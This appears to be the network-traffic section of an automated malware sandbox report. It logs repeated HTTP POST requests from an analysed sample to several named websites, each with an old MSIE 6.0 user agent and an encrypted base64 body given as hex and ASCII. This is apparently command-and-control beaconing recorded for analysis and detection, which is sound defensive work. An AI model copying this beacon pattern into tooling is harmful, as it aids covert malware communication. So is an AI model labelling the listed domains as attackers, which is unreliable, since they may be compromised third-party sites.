32 55 39 48 36 53 4c 71 6e 49 47 45 44 30 4d 39 6f 48 36 50 71 6e 46 76 4c 36 4c 62 6d 49 2b 37 67 56 46 50 45 67 4b 78 45 47 44 50 58 53 78 52 76 55 4b 66 63 4a 46 68 5a 7a 4b 6c 71 4e 51 75 42 7a 6e 45 41 79 45 2f 4c 76 47 77 47 35 67 44 6e 4b 75 79 55 46 70 57 4c 70 6b 37 65 5a 6a 6c 4b 54 4b 6b 41 61 66 6b 65 39 47 78 36 58 76 75 61 47 39 4e 49 6e 68 44 43 6b 39 4f 39 47 41 76 79 63 46 66 32 47 34 4b 34 58 52 2f 41 6d 5a 6e 36 63 71 33 48 65 65 45 31 75 77 62 79 45 30 36 79 6d 57 78 33 56 5a 33 6c 4e 63 2f 73 68 69 34 4f 48 30 43 6d 75 69 63 62 42 48 78 66 75 56 6f 66 4b 72 62 37 77 64 37 55 39 4d 6c 76 4d 7a 48 76 35 37 4e 67 71 30 34 41 38 45 2b 51 34 6d 51 2f 67 53 78 38 48 68 45 5a 47 45 75 30 49 67 47 59 4b 72 6a 7a 63 6c 58 46 65 56 43 39 54 34 66 36 75 4b 46 6b 4a 54 4f 4b 34 50 49 34 73 47 64 35 6f 64 74 69 51 4c 4f 50 78 36 75 35 58 69 75 4c 78 34 63 52 41 55 68 49 67 33 52 53 34 6e 75 75 30 30 70 54 74 47 67 42 4f 49 66 52 78 4d 68 4f 65 44 47 54 51 79 56 33 32 72 71 61 55 75 78 49 63 32 39 63 62 6d 69 6f 64 53 47 45 6c 52 35 36 42 4e 66 5a 69 57 51 69 34 6f 34 67 42 57 4f 53 2b 56 61 59 72 47 62 57 4a 6a 52 73 32 32 64 6d 53 33 6a 68 39 39 42 66 30 75 57 77 6f 77 2f 50 73 65 5a 4a 58 55 75 6c 42 62 49 2b 2f 46 47 54 78 6d 63 76 2f 67 6f 44 7a 42 2b 4e 6a 77 78 7a 78 55 3d Data Ascii: Yc9e6eaTyRXjFDKvgRoPGgl22R7Gb33GegZQ5P00T6c/dKuKMtEPAb0oBBQFrwsHkjTExpVPDXYUn76eqxF+J7frIb2oNp6DZB7CLQl42IlzmglxhhAHsVaEwpxFL3oRX7N+E/vV0NMj2U9H6SLqnIGED0M9oH6PqnFvL6LbmI+7gVFPEgKxEGDPXSxRvUKfcJFhZzKlqNQuBznEAyE/LvGwG5gDnKuyUFpWLpk7eZjlKTKkAafke9Gx6XvuaG9NInhDCk9O9GAvycFf2G4K4XR/AmZn6cq3HeeE1uwbyE06ymWx3VZ3lNc/shi4OH0CmuicbBHxfuVofKrb7wd7U9MlvMzHv57Ngq04A8E+Q4mQ/gSx8HhEZGEu0IgGYKrjzclXFeVC9T4f6uKFkJTOK4PI4sGd5odtiQLOPx6u5XiuLx4cRAUhIg3RS4nuu00pTtGgBOIfRxMhOeDGTQyV32rqaUuxIc29cbmiodSGElR56BNfZiWQi4o4gBWOS+VaYrGbWJjRs22dmS3jh99Bf0uWwow/PseZJXUulBbI+/FGTxmcv/goDzB+NjwxzxU=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jacomfg.comCache-Control: no-cacheData Raw: 79 46 72 73 6f 69 65 4c 36 42 57 72 6b 6e 72 75 31 6f 35 2b 6c 2f 41 4c 58 6b 47 64 45 72 54 2b 53 2f 47 76 44 51 76 45 54 37 70 63 35 41 69 76 70 37 46 54 74 35 63 56 41 79 32 4b 57 38 42 6e 35 43 44 42 6d 46 44 72 53 59 54 6e 37 37 79 71 2f 2f 69 49 4b 61 70 6e 68 6a 37 44 64 6d 7a 53 66 54 49 73 42 6d 36 64 31 46 58 79 64 48 34 4f 73 59 71 46 36 6b 36 73 44 7a 59 4c 61 43 65 49 4e 59 72 6f 75 4d 30 78 32 6d 69 52 53 48 4f 68 44 2f 41 32 72 69 39 79 43 4f 36 4a 7a 33 31 75 57 53 51 4d 77 63 7a 7a 5a 6b 77 50 58 2f 51 46 37 6a 73 41 6b 61 41 6b 6c 2f 74 37 47 72 4f 58 61 6a 75 4d 38 70 55 34 59 42 67 6a 58 67 68 56 33 33 4b 30 2f 6c 55 69 62 48 78 38 47 30 65 46 77 59 43 67 79 6c 37 67 46 55 59 39 76 73 4e 41 75 2f 66 75 6e 35 38 4b 30 53 6e 69 6e 4d 39 2b 4e 2f 43 79 6b 53 43 42 45 53 30 32 75 44 4f 79 32 42 77 41 69 4e 4b 66 56 30 41 57 4f 53 70 4f 56 6c 63 34 37 7a 65 75 7a 6f 69 44 45 6f 51 5a 32 43 37 71 48 57 36 56 74 62 35 6c 39 55 32 2f 6b 70 74 41 7a 54 78 62 4a 45 63 53 54 73 71 33 30 52 2b 66 75 57 45 62 54 6c 66 71 50 67 64 58 6b 75 34 34 30 75 62 7a 49 54 34 57 4b 2b 49 6c 46 42 41 62 4e 41 37 48 61 57 69 59 6a 6a 51 49 58 55 71 70 57 48 64 57 33 2b 5a 4c 5a 6d 34 51 79 48 53 34 4c 4d 4f 30 48 5a 4d 44 32 48 41 53 4a 67 78 6f 36 61 76 79 62 7a 33 6c 61 51 77 6d 6e 31 54 61 67 48 5a 55 5a 52 4c 59 48 46 45 4c 5a 4b 41 55 4d 4b 33 50 67 48 50 49 4e 53 32 37 6f 32 35 73 6e 55 4a 69 2b 6b 68 4f 6a 71 67 48 44 45 79 72 73 43 72 39 6c 61 6f 33 6e 71 78 4d 6e 51 31 72 6a 37 6c 75 4e 78 5a 57 45 45 33 65 73 4e 48 45 67 55 43 5a 4a 2f 51 39 74 2f 75 43 4b 44 4c 64 78 57 7a 41 32 73 50 6b 65 75 6c 4a 46 32 62 6f 74 4d 7a 74 38 41 3d 3d Data Ascii: yFrsoieL6BWrknru1o5+l/ALXkGdErT+S/GvDQvET7pc5Aivp7FTt5cVAy2KW8Bn5CDBmFDrSYTn77yq//iIKapnhj7DdmzSfTIsBm6d1FXydH4OsYqF6k6sDzYLaCeINYrouM0x2miRSHOhD/A2ri9yCO6Jz31uWSQMwczzZkwPX/QF7jsAkaAkl/t7GrOXajuM8pU4YBgjXghV33K0/lUibHx8G0eFwYCgyl7gFUY9vsNAu/fun58K0SninM9+N/CykSCBES02uDOy2BwAiNKfV0AWOSpOVlc47zeuzoiDEoQZ2C7qHW6Vtb5l9U2/kptAzTxbJEcSTsq30R+fuWEbTlfqPgdXku440ubzIT4WK+IlFBAbNA7HaWiYjjQIXUqpWHdW3+ZLZm4QyHS4LMO0HZMD2HASJgxo6avybz3laQwmn1TagHZUZRLYHFELZKAUMK3PgHPINS27o25snUJi+khOjqgHDEyrsCr9lao3nqxMnQ1rj7luNxZWEE3esNHEgUCZJ/Q9t/uCKDLdxWzA2sPkeulJF2botMzt8A==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.netcr.comCache-Control: no-cacheData Raw: 62 47 33 74 4f 70 51 71 35 52 56 42 46 73 47 58 62 78 52 39 30 4f 64 32 52 72 4d 4d 37 77 7a 55 43 46 6b 6c 4c 35 72 54 70 68 33 52 6b 68 2f 35 4f 31 4a 57 49 6c 75 53 76 49 6a 41 4f 67 5a 6c 72 32 48 77 33 6a 42 76 73 79 46 6b 76 79 75 55 69 59 57 7a 63 38 32 52 66 6b 6f 47 2f 51 6e 6e 4c 49 53 64 4a 61 73 74 53 31 52 4a 31 6c 7a 48 46 6f 53 73 56 50 4e 66 6d 32 71 45 75 7a 46 51 42 64 61 57 65 68 4c 63 56 33 41 66 4c 39 2f 74 31 4f 2b 4b 62 58 2b 59 73 39 68 57 45 44 49 58 79 61 4a 61 55 67 49 43 34 56 4c 64 6f 31 33 57 70 48 50 4c 44 36 74 2f 2f 46 31 4c 6f 58 37 58 63 6d 77 74 41 72 75 4d 6e 70 48 44 74 4b 56 50 76 76 70 6f 4d 53 51 5a 50 4e 48 5a 48 6e 54 71 2f 59 6f 42 4f 75 68 74 48 6d 61 67 49 67 45 6d 71 49 31 77 2b 30 48 41 46 51 2b 4d 74 42 76 67 76 67 6a 35 70 33 65 63 30 79 70 39 4a 50 47 52 64 4a 63 42 66 45 59 6c 51 32 31 50 6a 44 36 62 36 41 4f 4f 68 75 70 6b 46 4a 43 6f 56 64 61 4c 78 7a 35 53 49 51 48 51 30 6d 79 38 77 58 4c 35 39 4e 2b 4c 59 6f 75 62 6b 6d 58 67 75 39 49 64 38 68 59 4b 6c 38 33 36 72 6b 2f 32 46 53 76 64 4c 47 36 73 6d 4b 66 4b 6c 5a 4d 6b 70 61 6b 68 33 37 51 62 6c 52 74 57 48 7a 66 35 58 66 52 5a 71 2f 66 4e 4a 6a 7a 7a 35 33 6b 6d 31 37 6f 66 39 61 43 52 44 57 6d 56 31 43 56 4a 42 56 72 72 6f 35 67 69 36 45 76 36 48 73 49 36 73 47 69 44 31 4b 54 6a 68 66 77 51 6b 75 46 44 64 43 50 6f 36 77 49 67 4a 73 6f 74 45 31 54 35 7a 6a 74 57 78 6b 70 6f 42 6e 4b 64 4f 46 76 36 4c 6b 35 4f 44 46 58 64 4d 52 42 31 43 78 38 6e 53 55 44 36 61 6d 7a 76 64 70 54 69 59 74 6c 43 66 79 74 67 55 4e 4b 54 41 53 5a 6b 31 75 70 5a 46 67 6d 39 4c 59 75 43 62 54 2b 30 Data Ascii: bG3tOpQq5RVBFsGXbxR90Od2RrMM7wzUCFklL5rTph3Rkh/5O1JWIluSvIjAOgZlr2Hw3jBvsyFkvyuUiYWzc82RfkoG/QnnLISdJastS1RJ1lzHFoSsVPNfm2qEuzFQBdaWehLcV3AfL9/t1O+KbX+Ys9hWEDIXyaJaUgIC4VLdo13WpHPLD6t//F1LoX7XcmwtAruMnpHDtKVPvvpoMSQZPNHZHnTq/YoBOuhtHmagIgEmqI1w+0HAFQ+MtBvgvgj5p3ec0yp9JPGRdJcBfEYlQ21PjD6b6AOOhupkFJCoVdaLxz5SIQHQ0my8wXL59N+LYoubkmXgu9Id8hYKl836rk/2FSvdLG6smKfKlZMkpakh37QblRtWHzf5XfRZq/fNJjzz53km17of9aCRDWmV1CVJBVrro5gi6Ev6HsI6sGiD1KTjhfwQkuFDdCPo6wIgJsotE1T5zjtWxkpoBnKdOFv6Lk5ODFXdMRB1Cx8nSUD6amzvdpTiYtlCfytgUNKTASZk1upZFgm9LYuCbT+0
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.wifi4all.nlCache-Control: no-cacheData Raw: 64 44 76 51 4a 79 73 73 39 52 58 52 6b 71 55 66 41 6c 4f 75 57 5a 54 48 63 57 6a 78 4d 58 77 71 6a 34 41 46 75 64 2b 41 7a 36 32 37 64 54 6f 2f 49 5a 77 63 52 44 43 37 38 76 75 7a 4c 78 49 53 6b 57 59 45 69 30 4d 67 53 4d 4c 4a 30 67 4c 42 65 52 41 56 34 7a 6b 5a 5a 76 37 43 76 77 55 42 6e 4e 79 66 64 71 55 5a 51 49 45 53 38 4e 78 38 68 44 72 77 69 70 51 4c 2b 39 4e 77 4a 6d 2b 34 78 57 66 34 69 52 64 4a 50 55 79 44 66 70 37 55 67 39 62 45 69 47 4c 71 33 65 4a 30 41 4e 4b 68 6b 5a 58 57 44 4a 4c 73 69 55 39 46 33 70 52 57 38 49 72 74 50 31 52 2b 4e 4c 36 70 65 59 71 6c 36 6f 39 31 47 39 4f 54 2f 74 53 50 52 57 6d 30 47 59 62 47 5a 38 77 39 53 6a 54 52 7a 33 67 67 71 43 64 41 32 49 45 31 77 46 53 6f 31 31 6c 79 79 39 32 71 4b 73 53 37 6d 36 76 5a 2b 6a 71 4e 70 4c 78 59 67 55 4a 78 33 52 53 72 53 35 59 48 48 37 34 30 61 50 39 5a 59 48 76 43 6d 4d 45 77 47 57 69 4e 2b 70 44 30 62 76 6d 4d 6b 2f 68 65 77 44 4e 51 31 55 65 70 62 5a 64 63 59 62 6b 79 6e 46 4c 56 57 73 46 68 59 55 79 67 66 6b 77 32 67 33 78 42 6a 4c 71 49 54 52 76 47 33 50 46 6e 74 74 62 55 6c 38 32 73 39 65 2b 70 6c 66 38 71 62 6d 56 75 36 33 50 4b 2f 50 38 6c 4f 75 48 4e 65 70 32 39 6e 50 4c 35 50 4d 53 75 67 78 30 57 78 36 54 6b 49 32 70 73 6d 53 4c 6e 39 4b 38 4e 50 2f 78 6e 78 59 37 4c 67 45 4e 54 50 46 38 62 32 30 72 4d 64 31 4f 4d 56 69 39 41 70 46 6f 2f 4f 4f 2f 67 4f 6f 2b 46 67 30 67 37 64 6a 4c 41 53 74 6e 38 6a 33 30 63 50 59 35 72 43 4e 77 75 55 57 44 31 74 6d 34 31 79 71 39 4a 43 79 65 2b 48 74 69 31 44 68 37 45 67 58 41 44 43 33 4e 77 72 58 77 46 68 6f 48 44 6a 63 49 31 30 5a 67 6b 59 4e 32 63 6d 73 43 5a 6d 64 70 4d 50 52 67 3d Data Ascii: dDvQJyss9RXRkqUfAlOuWZTHcWjxMXwqj4AFud+Az627dTo/IZwcRDC78vuzLxISkWYEi0MgSMLJ0gLBeRAV4zkZZv7CvwUBnNyfdqUZQIES8Nx8hDrwipQL+9NwJm+4xWf4iRdJPUyDfp7Ug9bEiGLq3eJ0ANKhkZXWDJLsiU9F3pRW8IrtP1R+NL6peYql6o91G9OT/tSPRWm0GYbGZ8w9SjTRz3ggqCdA2IE1wFSo11lyy92qKsS7m6vZ+jqNpLxYgUJx3RSrS5YHH740aP9ZYHvCmMEwGWiN+pD0bvmMk/hewDNQ1UepbZdcYbkynFLVWsFhYUygfkw2g3xBjLqITRvG3PFnttbUl82s9e+plf8qbmVu63PK/P8lOuHNep29nPL5PMSugx0Wx6TkI2psmSLn9K8NP/xnxY7LgENTPF8b20rMd1OMVi9ApFo/OO/gOo+Fg0g7djLAStn8j30cPY5rCNwuUWD1tm41yq9JCye+Hti1Dh7EgXADC3NwrXwFhoHDjcI10ZgkYN2cmsCZmdpMPRg=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 66 39 51 6e 67 54 37 68 76 52 55 4f 4c 47 79 4a 43 52 66 67 2f 53 45 68 4c 4c 62 2b 45 38 75 41 55 6e 30 53 39 6e 57 68 4e 58 4c 34 53 6c 62 58 6b 47 37 78 43 48 78 78 77 54 6a 73 4f 58 43 6f 59 69 2f 65 2f 47 70 39 4a 42 6d 63 33 47 7a 74 32 70 6a 35 38 4c 7a 35 73 39 45 62 48 6b 41 49 30 72 57 74 33 38 70 58 73 48 4d 51 69 2f 30 73 35 32 51 54 4f 64 70 4d 78 64 68 72 59 72 53 42 63 4e 46 58 4f 6b 6f 49 54 72 76 39 4a 6e 6f 64 75 59 6f 38 30 68 44 65 76 4c 43 2b 66 6c 30 72 66 6d 77 6c 2f 67 50 48 4d 68 73 30 78 62 37 62 6b 6b 6a 52 54 6b 5a 36 32 38 6b 4d 6a 71 4f 34 7a 6b 36 53 45 50 4b 68 71 4c 61 42 6f 4b 5a 56 2f 36 2f 31 6b 79 32 6f 2f 42 78 74 4c 53 63 52 63 76 64 6c 72 73 58 42 70 5a 66 33 37 39 4d 4f 32 68 70 63 63 76 78 4b 5a 48 43 78 61 42 53 6b 64 73 4c 56 6c 68 59 37 6d 4f 62 42 68 6b 33 76 67 55 64 33 4d 41 76 44 53 72 50 2f 39 43 44 57 61 48 74 33 31 30 75 33 70 44 42 72 76 6a 66 41 6e 65 30 50 30 76 78 75 66 79 59 64 41 4f 6f 55 34 4d 4b 6d 57 56 4a 63 6c 4a 5a 39 41 73 36 51 37 49 48 69 46 72 4e 38 77 77 51 37 77 57 6f 46 70 38 7a 71 38 45 58 6b 42 45 70 48 72 51 42 4a 48 4f 39 4c 6e 45 69 64 58 39 7a 76 4c 52 37 37 4a 73 56 62 6f 74 33 69 55 74 69 34 66 55 51 44 2b 72 73 4c 34 58 4e 48 63 62 6e 35 34 64 78 63 34 43 51 6f 2f 46 6a 37 41 36 4b 4a 4d 50 5a 50 58 53 47 56 61 41 55 75 33 56 44 67 44 30 6c 63 33 2f 4b 66 38 65 33 52 4c 59 31 6d 45 31 61 51 31 79 6a 38 73 55 52 4d 5a 63 76 6e 70 48 32 31 6a 71 4e 66 57 6a 79 4a 4a 35 58 44 54 47 79 67 6f 6e 65 50 53 73 6d 56 55 4b 67 4e 71 64 69 68 31 30 39 5a 51 44 46 39 76 2f 48 62 64 6a 5a 4f 36 6e 69 76 34 35 37 68 43 53 32 5a 6f 35 38 77 30 4c 72 73 46 43 77 52 70 38 4a 79 32 78 62 74 45 6b 6c 52 51 6f 32 67 79 6a 43 73 50 6c 38 68 66 66 74 59 72 5a 78 39 46 5a 2f 2b 39 6a 59 4a 66 68 63 3d Data Ascii: f9QngT7hvRUOLGyJCRfg/SEhLLb+E8uAUn0S9nWhNXL4SlbXkG7xCHxxwTjsOXCoYi/e/Gp9JBmc3Gzt2pj58Lz5s9EbHkAI0rWt38pXsHMQi/0s52QTOdpMxdhrYrSBcNFXOkoITrv9JnoduYo80hDevLC+fl0rfmwl/gPHMhs0xb7bkkjRTkZ628kMjqO4zk6SEPKhqLaBoKZV/6/1ky2o/BxtLScRcvdlrsXBpZf379MO2hpccvxKZHCxaBSkdsLVlhY7mObBhk3vgUd3MAvDSrP/9CDWaHt310u3pDBrvjfAne0P0vxufyYdAOoU4MKmWVJclJZ9As6Q7IHiFrN8wwQ7wWoFp8zq8EXkBEpHrQBJHO9LnEidX9zvLR77JsVbot3iUti4fUQD+rsL4XNHcbn54dxc4CQo/Fj7A6KJMPZPXSGVaAUu3VDgD0lc3/Kf8e3RLY1mE1aQ1yj8sURMZcvnpH21jqNfWjyJJ5XDTGygonePSsmVUKgNqdih109ZQDF9v/HbdjZO6niv457hCS2Zo58w0LrsFCwRp8Jy2xbtEklRQo2gyjCsPl8hfftYrZx9FZ/+9jYJfhc=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jacomfg.comCache-Control: no-cacheData Raw: 79 46 72 73 6f 69 65 4c 36 42 57 72 6b 6e 72 75 31 6f 35 2b 6c 2f 41 4c 58 6b 47 64 45 72 54 2b 53 2f 47 76 44 51 76 45 54 37 70 63 35 41 69 76 70 37 46 54 74 35 63 56 41 79 32 4b 57 38 42 6e 35 43 44 42 6d 46 44 72 53 59 54 6e 37 37 79 71 2f 2f 69 49 4b 61 70 6e 68 6a 37 44 64 6d 7a 53 66 54 49 73 42 6d 36 64 31 46 58 79 64 48 34 4f 73 59 71 46 36 6b 36 73 44 7a 59 4c 61 43 65 49 4e 59 72 6f 75 4d 30 78 32 6d 69 52 53 48 4f 68 44 2f 41 32 72 69 39 79 43 4f 36 4a 7a 33 31 75 57 53 51 4d 77 63 7a 7a 5a 6b 77 50 58 2f 51 46 37 6a 73 41 6b 61 41 6b 6c 2f 74 37 47 72 4f 58 61 6a 75 4d 38 70 55 34 59 42 67 6a 58 67 68 56 33 33 4b 30 2f 6c 55 69 62 48 78 38 47 30 65 46 77 59 43 67 79 6c 37 67 46 55 59 39 76 73 4e 41 75 2f 66 75 6e 35 38 4b 30 53 6e 69 6e 4d 39 2b 4e 2f 43 79 6b 53 43 42 45 53 30 32 75 44 4f 79 32 42 77 41 69 4e 4b 66 56 30 41 57 4f 53 70 4f 56 6c 63 34 37 7a 65 75 7a 6f 69 44 45 6f 51 5a 32 43 37 71 48 57 36 56 74 62 35 6c 39 55 32 2f 6b 70 74 41 7a 54 78 62 4a 45 63 53 54 73 71 33 30 52 2b 66 75 57 45 62 54 6c 66 71 50 67 64 58 6b 75 34 34 30 75 62 7a 49 54 34 57 4b 2b 49 6c 46 42 41 62 4e 41 37 48 61 57 69 59 6a 6a 51 49 58 55 71 70 57 48 64 57 33 2b 5a 4c 5a 6d 34 51 79 48 53 34 4c 4d 4f 30 48 5a 4d 44 32 48 41 53 4a 67 78 6f 36 61 76 79 62 7a 33 6c 61 51 77 6d 6e 31 54 61 67 48 5a 55 5a 52 4c 59 48 46 45 4c 5a 4b 41 55 4d 4b 33 50 67 48 50 49 4e 53 32 37 6f 32 35 73 6e 55 4a 69 2b 6b 68 4f 6a 71 67 48 44 45 79 72 73 43 72 39 6c 61 6f 33 6e 71 78 4d 6e 51 31 72 6a 37 6c 75 4e 78 5a 57 45 45 33 65 73 4e 48 45 67 55 43 5a 4a 2f 51 39 74 2f 75 43 4b 44 4c 64 78 57 7a 41 32 73 50 6b 65 75 6c 4a 46 32 62 6f 74 4d 7a 74 38 41 3d 3d Data Ascii: yFrsoieL6BWrknru1o5+l/ALXkGdErT+S/GvDQvET7pc5Aivp7FTt5cVAy2KW8Bn5CDBmFDrSYTn77yq//iIKapnhj7DdmzSfTIsBm6d1FXydH4OsYqF6k6sDzYLaCeINYrouM0x2miRSHOhD/A2ri9yCO6Jz31uWSQMwczzZkwPX/QF7jsAkaAkl/t7GrOXajuM8pU4YBgjXghV33K0/lUibHx8G0eFwYCgyl7gFUY9vsNAu/fun58K0SninM9+N/CykSCBES02uDOy2BwAiNKfV0AWOSpOVlc47zeuzoiDEoQZ2C7qHW6Vtb5l9U2/kptAzTxbJEcSTsq30R+fuWEbTlfqPgdXku440ubzIT4WK+IlFBAbNA7HaWiYjjQIXUqpWHdW3+ZLZm4QyHS4LMO0HZMD2HASJgxo6avybz3laQwmn1TagHZUZRLYHFELZKAUMK3PgHPINS27o25snUJi+khOjqgHDEyrsCr9lao3nqxMnQ1rj7luNxZWEE3esNHEgUCZJ/Q9t/uCKDLdxWzA2sPkeulJF2botMzt8A==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ex-olive.comCache-Control: no-cacheData Raw: 77 64 53 78 62 75 56 61 4b 52 62 49 39 76 5a 79 6a 4d 38 63 74 31 35 30 58 7a 6f 7a 75 4c 6a 4c 36 64 57 6e 6a 4a 78 4e 44 4e 73 6c 64 48 4e 4c 72 67 71 65 6d 7a 30 39 53 33 48 76 32 32 4f 56 31 33 6e 2f 4a 33 6f 64 6e 77 70 66 4d 7a 6b 47 71 5a 78 68 6e 76 65 78 5a 6c 63 62 6d 6b 33 52 4e 59 30 77 48 58 66 57 4e 6d 6a 39 33 2b 55 72 63 70 68 59 32 6a 4c 30 6d 4b 43 44 6d 31 4a 75 74 58 5a 6c 44 68 55 30 70 4d 70 41 31 58 44 52 46 6c 78 59 63 48 63 4e 6d 51 76 45 33 47 4f 79 49 33 30 7a 55 48 62 67 42 57 76 47 53 44 44 4f 33 62 41 76 42 75 69 77 33 61 69 34 4b 64 47 4d 4d 59 4f 6d 71 68 4c 55 31 76 51 66 7a 4e 31 58 73 34 63 79 65 6f 58 6d 49 54 78 35 70 32 4e 55 6c 70 39 6e 37 2f 34 41 73 36 46 2f 73 63 77 58 2b 4c 4c 42 51 71 50 48 4d 4b 41 63 70 4a 62 30 54 69 30 53 76 65 31 38 62 74 78 45 31 76 79 4e 6e 76 39 49 6d 6d 4f 4e 7a 71 44 52 77 56 51 63 51 6e 5a 69 7a 69 74 55 4d 48 48 76 56 52 47 67 37 70 56 32 54 36 52 63 61 33 76 67 42 76 55 49 62 2b 63 68 6c 53 68 32 67 36 4c 55 36 33 6f 36 4a 6f 45 37 2b 74 77 34 68 6b 54 6f 4d 68 30 75 37 41 42 54 6f 46 6c 41 6b 4b 49 49 34 76 61 58 41 59 56 30 67 52 4c 6b 53 41 52 79 6c 61 61 45 37 51 46 44 68 55 67 32 69 6a 33 50 72 53 36 63 6d 6a 6b 2f 76 55 44 71 77 6e 55 48 4e 73 56 6d 48 56 6e 6b 6d 61 39 36 4e 37 42 72 71 49 7a 37 2b 59 44 47 73 59 71 79 67 44 54 45 75 62 4a 65 65 39 67 69 63 6f 75 65 36 66 4c 68 57 51 34 4f 41 56 48 47 78 74 63 78 6e 6e 76 54 32 57 43 33 69 52 4b 36 6c 72 41 75 64 34 51 45 4a 31 33 5a 7a 32 2f 36 69 38 6e 52 4c 4d 31 61 75 71 45 35 79 2b 72 35 56 6c 70 37 39 4d 4c 2b 4a 74 67 6b 2f 52 6a 42 30 77 39 31 69 66 33 55 5a 75 6a 48 76 41 2b 72 50 37 2b 46 58 64 62 31 Data Ascii: wdSxbuVaKRbI9vZyjM8ct150XzozuLjL6dWnjJxNDNsldHNLrgqemz09S3Hv22OV13n/J3odnwpfMzkGqZxhnvexZlcbmk3RNY0wHXfWNmj93+UrcphY2jL0mKCDm1JutXZlDhU0pMpA1XDRFlxYcHcNmQvE3GOyI30zUHbgBWvGSDDO3bAvBuiw3ai4KdGMMYOmqhLU1vQfzN1Xs4cyeoXmITx5p2NUlp9n7/4As6F/scwX+LLBQqPHMKAcpJb0Ti0Sve18btxE1vyNnv9ImmONzqDRwVQcQnZizitUMHHvVRGg7pV2T6Rca3vgBvUIb+chlSh2g6LU63o6JoE7+tw4hkToMh0u7ABToFlAkKII4vaXAYV0gRLkSARylaaE7QFDhUg2ij3PrS6cmjk/vUDqwnUHNsVmHVnkma96N7BrqIz7+YDGsYqygDTEubJee9gicoue6fLhWQ4OAVHGxtcxnnvT2WC3iRK6lrAud4QEJ13Zz2/6i8nRLM1auqE5y+r5Vlp79ML+Jtgk/RjB0w91if3UZujHvA+rP7+FXdb1
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 38 65 59 4c 74 4f 67 37 50 42 59 43 79 4e 58 34 71 32 34 45 4e 31 73 58 57 34 33 77 6a 46 72 4b 6e 44 33 4e 46 57 6e 56 6f 58 35 50 6a 44 31 2b 62 31 6f 69 59 65 63 53 42 68 4c 2f 30 74 69 52 35 6e 6a 48 74 68 34 4d 5a 49 78 78 56 4b 74 42 76 53 45 58 49 55 65 53 71 72 52 77 50 4b 33 49 50 78 4f 33 51 55 4f 57 79 6e 6b 72 69 39 75 44 5a 61 45 6a 4d 35 67 72 38 72 56 6c 2f 53 50 6e 39 41 46 44 64 37 35 73 43 71 68 2f 66 73 67 31 7a 6e 79 79 68 79 31 51 48 30 74 45 7a 59 2b 73 61 51 32 31 6e 30 69 6f 48 43 51 6d 4d 4d 36 77 5a 49 79 62 33 6c 63 59 41 47 61 43 79 5a 30 4e 6e 4c 64 67 35 7a 6a 6d 58 4c 37 50 6f 34 78 36 2f 6f 56 68 78 4f 38 77 59 2b 72 7a 47 67 55 69 7a 78 34 43 42 6e 48 6e 6b 54 36 4c 47 44 32 55 4e 49 75 75 61 4d 78 4d 33 58 4d 31 79 4c 51 78 30 79 66 34 45 58 39 51 6a 43 4a 33 70 2b 55 46 68 61 41 56 76 50 38 2f 2f 55 75 69 56 42 33 49 4a 55 44 64 4d 79 30 49 48 76 56 78 4a 69 44 45 4c 34 36 56 31 37 37 62 4c 6d 46 74 35 35 38 44 58 65 50 44 50 73 7a 42 50 37 56 34 4d 4c 50 6a 47 4c 6d 63 63 54 4b 57 61 30 6d 69 47 50 75 63 49 37 74 7a 6d 47 69 49 6d 4e 4d 4b 44 58 37 79 41 47 65 54 4f 30 75 64 48 61 4f 45 52 6d 75 58 52 31 6f 78 63 76 72 76 50 52 49 4c 4b 66 46 52 33 70 61 5a 59 50 54 58 65 2b 4d 67 63 71 54 61 76 54 37 2b 31 77 4d 4d 55 31 79 6f 79 48 31 69 31 4f 58 36 68 71 73 6f 42 4e 63 44 42 73 79 62 70 58 72 77 75 6f 55 76 6a 7a 2f 67 2f 4a 47 72 37 55 58 70 45 48 44 76 52 4f 59 77 6a 34 33 2b 36 30 65 38 74 45 45 57 51 59 33 71 31 61 79 43 77 4b 44 59 6e 49 64 4b 58 78 7a 35 32 75 30 77 41 55 77 47 5a 33 6a 56 31 64 38 2f 4f 31 64 48 42 4e 32 77 Data Ascii: 8eYLtOg7PBYCyNX4q24EN1sXW43wjFrKnD3NFWnVoX5PjD1+b1oiYecSBhL/0tiR5njHth4MZIxxVKtBvSEXIUeSqrRwPK3IPxO3QUOWynkri9uDZaEjM5gr8rVl/SPn9AFDd75sCqh/fsg1znyyhy1QH0tEzY+saQ21n0ioHCQmMM6wZIyb3lcYAGaCyZ0NnLdg5zjmXL7Po4x6/oVhxO8wY+rzGgUizx4CBnHnkT6LGD2UNIuuaMxM3XM1yLQx0yf4EX9QjCJ3p+UFhaAVvP8//UuiVB3IJUDdMy0IHvVxJiDEL46V177bLmFt558DXePDPszBP7V4MLPjGLmccTKWa0miGPucI7tzmGiImNMKDX7yAGeTO0udHaOERmuXR1oxcvrvPRILKfFR3paZYPTXe+MgcqTavT7+1wMMU1yoyH1i1OX6hqsoBNcDBsybpXrwuoUvjz/g/JGr7UXpEHDvROYwj43+60e8tEEWQY3q1ayCwKDYnIdKXxz52u0wAUwGZ3jV1d8/O1dHBN2w
